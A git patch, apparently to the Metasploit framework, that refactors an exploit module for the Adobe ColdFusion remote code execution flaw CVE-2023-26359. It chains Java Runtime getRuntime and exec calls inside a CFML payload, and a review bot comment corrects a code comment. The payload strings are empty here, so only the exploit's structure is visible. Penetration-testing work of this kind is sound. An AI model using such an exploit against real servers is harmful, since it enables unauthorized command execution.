From fa1e7ae0169c1929be06febfa2d036bd81607644 Mon Sep 17 00:00:00 2001
From: sfewer-r7
Date: Tue, 11 Apr 2023 11:22:13 +0100
Subject: [PATCH] close all CMFL tags and chain the getRuntime and exec calls for berevity
---
 .../http/adobe_coldfusion_rce_cve_2023_26359.rb | 17 +++++------------
 1 file changed, 5 insertions(+), 12 deletions(-)
diff --git a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb
index f9ba176372..e2e4fe1e72 100644
--- a/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb
+++ b/modules/exploits/multi/http/adobe_coldfusion_rce_cve_2023_26359.rb
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 cfc_payload = ""

 # Set our cf_param with the data in the requests form data, this is the command to run.
- cfc_payload << ""
+ cfc_payload << ""

 # Here we construct a CFML payload to stage the :cmd and :dropper commands...
 shell_name = nil
@@ -173,22 +173,15 @@ class MetasploitModule < Msf::Exploit::Remote
 cf_array = Rex::Text.rand_text_alpha_lower(4)

 # Create an array of arguments to pass to exec()
- cfc_payload << ""
+ cfc_payload << ""

 cf_runtime = Rex::Text.rand_text_alpha_lower(4)

 # Get a reference to the java.lang.Runtime class.
- cfc_payload << ""
+ cfc_payload << ""

- cf_rt = Rex::Text.rand_text_alpha_lower(4)
-
- # Call the static getRuntime method.
- cfc_payload << ""
-
- cf_res = Rex::Text.rand_text_alpha_lower(4)
-
- # Use exec() to execute our string array holding the command and the arguments.
- cfc_payload << ""
+ # Call the static Runtime.exec method to execute our string array holding the command and the arguments.
+ cfc_payload << ""

 # The end of the If tag.
 cfc_payload << ''
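Review bot: The new comment above the last added `cfc_payload <<` line in the second hunk calls `exec` a static method, but in `java.lang.Runtime` only `getRuntime()` is static and `exec()` is an instance method invoked on the object it returns. Since this commit chains the two calls, the comment should say so, for example `# Call the static Runtime.getRuntime method and chain exec() on the result to run our string array holding the command and its arguments.` The string literals are empty in this rendering, so the chained CFML itself cannot be checked here, and the enclosing method starts and ends outside the hunk.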